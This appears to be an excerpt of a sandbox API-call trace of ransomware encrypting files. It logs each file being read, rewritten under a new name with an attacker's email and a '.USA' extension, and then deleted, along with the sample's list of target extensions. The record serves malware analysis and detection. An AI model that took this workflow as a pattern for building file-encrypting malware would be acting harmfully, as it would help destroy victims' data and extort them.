1 [0268.296] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.296] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.296] SetEndOfFile (hFile=0x390) returned 1 [0268.296] CloseHandle (hObject=0x390) returned 1 [0268.296] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.296] SetEndOfFile (hFile=0x37c) returned 1 [0268.300] CloseHandle (hObject=0x37c) returned 1 [0268.300] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.300] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\outdr_01.mid")) returned 1 [0268.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.301] lstrlenW (lpString=".doc") returned 4 [0268.301] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.301] lstrlenW (lpString=".docx") returned 5 [0268.301] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.301] lstrlenW (lpString=".pdf") returned 4 [0268.301] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.301] lstrlenW (lpString=".xls") returned 4 [0268.301] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.301] lstrlenW (lpString=".xlsx") returned 5 [0268.301] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.301] lstrlenW (lpString=".ppt") returned 4 [0268.301] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.301] lstrlenW (lpString=".zip") returned 4 [0268.301] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.301] lstrlenW (lpString=".rar") returned 4 [0268.301] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.301] lstrlenW (lpString=".bz2") returned 4 [0268.301] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.301] lstrlenW (lpString=".7z") returned 3 [0268.301] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.301] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.302] lstrlenW (lpString=".dbf") returned 4 [0268.302] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.302] lstrlenW (lpString=".1cd") returned 4 [0268.302] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.302] lstrlenW (lpString=".jpg") returned 4 [0268.302] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.302] lstrlenW (lpString=".doc") returned 4 [0268.302] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.302] lstrlenW (lpString=".docx") returned 5 [0268.302] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.302] lstrlenW (lpString=".pdf") returned 4 [0268.302] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.302] lstrlenW (lpString=".xls") returned 4 [0268.302] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.302] lstrlenW (lpString=".xlsx") returned 5 [0268.302] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.302] lstrlenW (lpString=".ppt") returned 4 [0268.302] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.302] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.302] lstrlenW (lpString=".zip") returned 4 [0268.302] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.302] lstrlenW (lpString=".rar") returned 4 [0268.302] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.302] lstrlenW (lpString=".bz2") returned 4 [0268.303] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.303] lstrlenW (lpString=".7z") returned 3 [0268.303] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.303] lstrlenW (lpString=".dbf") returned 4 [0268.303] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.303] lstrlenW (lpString=".1cd") returned 4 [0268.303] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\OUTDR_01.MID") returned 63 [0268.303] lstrlenW (lpString=".jpg") returned 4 [0268.303] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.303] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.303] lstrlenW (lpString="PAPER_01.MID") returned 12 [0268.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.305] GetFileSizeEx (in: hFile=0x37c, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=6763) returned 1 [0268.305] CloseHandle (hObject=0x37c) returned 1 [0268.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid")) returned 0x20 [0268.305] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0268.305] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.305] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0268.309] GetLastError () returned 0x0 [0268.309] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x1a6b, lpOverlapped=0x0) returned 1 [0268.587] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x1a70, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x1a70, lpOverlapped=0x0) returned 1 [0268.588] ReadFile (in: hFile=0x37c, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0268.588] WriteFile (in: hFile=0x390, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.588] SetEndOfFile (hFile=0x390) returned 1 [0268.650] CloseHandle (hObject=0x390) returned 1 [0268.650] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0268.650] SetEndOfFile (hFile=0x37c) returned 1 [0268.684] CloseHandle (hObject=0x37c) returned 1 [0268.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\paper_01.mid")) returned 1 [0268.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.890] lstrlenW (lpString=".doc") returned 4 [0268.890] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.890] lstrlenW (lpString=".docx") returned 5 [0268.890] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.890] lstrlenW (lpString=".pdf") returned 4 [0268.890] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.890] lstrlenW (lpString=".xls") returned 4 [0268.890] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.890] lstrlenW (lpString=".xlsx") returned 5 [0268.890] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.890] lstrlenW (lpString=".ppt") returned 4 [0268.890] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.890] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.890] lstrlenW (lpString=".zip") returned 4 [0268.891] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.891] lstrlenW (lpString=".rar") returned 4 [0268.891] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.891] lstrlenW (lpString=".bz2") returned 4 [0268.891] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.891] lstrlenW (lpString=".7z") returned 3 [0268.891] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.891] lstrlenW (lpString=".dbf") returned 4 [0268.891] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.891] lstrlenW (lpString=".1cd") returned 4 [0268.891] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.891] lstrlenW (lpString=".jpg") returned 4 [0268.891] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.891] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.891] lstrlenW (lpString=".doc") returned 4 [0268.891] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0268.891] lstrlenW (lpString=".docx") returned 5 [0268.891] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0268.891] lstrlenW (lpString=".pdf") returned 4 [0268.891] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0268.891] lstrlenW (lpString=".xls") returned 4 [0268.891] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0268.891] lstrlenW (lpString=".xlsx") returned 5 [0268.891] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0268.891] lstrlenW (lpString=".ppt") returned 4 [0268.892] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0268.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.892] lstrlenW (lpString=".zip") returned 4 [0268.892] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0268.892] lstrlenW (lpString=".rar") returned 4 [0268.892] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0268.892] lstrlenW (lpString=".bz2") returned 4 [0268.892] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0268.892] lstrlenW (lpString=".7z") returned 3 [0268.892] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0268.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.892] lstrlenW (lpString=".dbf") returned 4 [0268.892] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0268.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.892] lstrlenW (lpString=".1cd") returned 4 [0268.892] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0268.892] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PAPER_01.MID") returned 63 [0268.892] lstrlenW (lpString=".jpg") returned 4 [0268.892] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0268.893] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0268.893] lstrlenW (lpString="SPACE_01.MID") returned 12 [0268.893] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.062] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=4219) returned 1 [0269.062] CloseHandle (hObject=0x348) returned 1 [0269.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid")) returned 0x20 [0269.062] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.063] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.063] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.063] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.142] GetLastError () returned 0x0 [0269.142] ReadFile (in: hFile=0x348, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x107b, lpOverlapped=0x0) returned 1 [0269.147] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x1080, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x1080, lpOverlapped=0x0) returned 1 [0269.148] ReadFile (in: hFile=0x348, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.148] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.148] SetEndOfFile (hFile=0x384) returned 1 [0269.148] CloseHandle (hObject=0x384) returned 1 [0269.149] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.149] SetEndOfFile (hFile=0x348) returned 1 [0269.151] CloseHandle (hObject=0x348) returned 1 [0269.151] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0269.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\space_01.mid")) returned 1 [0269.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.155] lstrlenW (lpString=".doc") returned 4 [0269.155] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.155] lstrlenW (lpString=".docx") returned 5 [0269.155] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.155] lstrlenW (lpString=".pdf") returned 4 [0269.155] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.155] lstrlenW (lpString=".xls") returned 4 [0269.155] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.155] lstrlenW (lpString=".xlsx") returned 5 [0269.155] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.155] lstrlenW (lpString=".ppt") returned 4 [0269.155] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.155] lstrlenW (lpString=".zip") returned 4 [0269.155] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.155] lstrlenW (lpString=".rar") returned 4 [0269.155] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.155] lstrlenW (lpString=".bz2") returned 4 [0269.155] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.155] lstrlenW (lpString=".7z") returned 3 [0269.155] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.155] lstrlenW (lpString=".dbf") returned 4 [0269.155] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.155] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.155] lstrlenW (lpString=".1cd") returned 4 [0269.155] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.156] lstrlenW (lpString=".jpg") returned 4 [0269.156] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.156] lstrlenW (lpString=".doc") returned 4 [0269.156] lstrcmpiW (lpString1=".doc", lpString2=".MID") returned -1 [0269.156] lstrlenW (lpString=".docx") returned 5 [0269.156] lstrcmpiW (lpString1=".docx", lpString2="1.MID") returned -1 [0269.156] lstrlenW (lpString=".pdf") returned 4 [0269.156] lstrcmpiW (lpString1=".pdf", lpString2=".MID") returned 1 [0269.156] lstrlenW (lpString=".xls") returned 4 [0269.156] lstrcmpiW (lpString1=".xls", lpString2=".MID") returned 1 [0269.156] lstrlenW (lpString=".xlsx") returned 5 [0269.156] lstrcmpiW (lpString1=".xlsx", lpString2="1.MID") returned -1 [0269.156] lstrlenW (lpString=".ppt") returned 4 [0269.156] lstrcmpiW (lpString1=".ppt", lpString2=".MID") returned 1 [0269.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.156] lstrlenW (lpString=".zip") returned 4 [0269.156] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0269.156] lstrlenW (lpString=".rar") returned 4 [0269.156] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0269.156] lstrlenW (lpString=".bz2") returned 4 [0269.156] lstrcmpiW (lpString1=".bz2", lpString2=".MID") returned -1 [0269.156] lstrlenW (lpString=".7z") returned 3 [0269.156] lstrcmpiW (lpString1=".7z", lpString2="MID") returned -1 [0269.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.156] lstrlenW (lpString=".dbf") returned 4 [0269.156] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0269.156] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.157] lstrlenW (lpString=".1cd") returned 4 [0269.157] lstrcmpiW (lpString1=".1cd", lpString2=".MID") returned -1 [0269.157] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SPACE_01.MID") returned 63 [0269.157] lstrlenW (lpString=".jpg") returned 4 [0269.157] lstrcmpiW (lpString1=".jpg", lpString2=".MID") returned -1 [0269.157] lstrcmpiW (lpString1=".MID", lpString2=".USA") returned -1 [0269.157] lstrlenW (lpString="SUMER_01.MID") returned 12 [0269.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x348 [0269.163] GetFileSizeEx (in: hFile=0x348, lpFileSize=0x3a8ff1c | out: lpFileSize=0x3a8ff1c*=14044) returned 1 [0269.163] CloseHandle (hObject=0x348) returned 1 [0269.163] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid")) returned 0x20 [0269.196] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0269.196] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0269.211] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.217] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.217] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SUMER_01.MID.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sumer_01.mid.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384 [0269.220] GetLastError () returned 0x0 [0269.220] ReadFile (in: hFile=0x388, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x36dc, lpOverlapped=0x0) returned 1 [0269.223] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0x36e0, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0x36e0, lpOverlapped=0x0) returned 1 [0269.224] ReadFile (in: hFile=0x388, lpBuffer=0x41f0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a8fed4, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesRead=0x3a8fed4*=0x0, lpOverlapped=0x0) returned 1 [0269.224] WriteFile (in: hFile=0x384, lpBuffer=0x41f0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3a8fc9c, lpOverlapped=0x0 | out: lpBuffer=0x41f0020*, lpNumberOfBytesWritten=0x3a8fc9c*=0xec, lpOverlapped=0x0) returned 1 [0269.224] SetEndOfFile (hFile=0x384) returned 1 [0269.225] CloseHandle (hObject=0x384) returned 1 [0269.225] SetFilePointerEx (in: hFile=0x388, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a8fec8 | out: lpNewFilePointer=0x0) returned 1 [0269.225] SetEndOfFile (hFile=0x388) returned 1 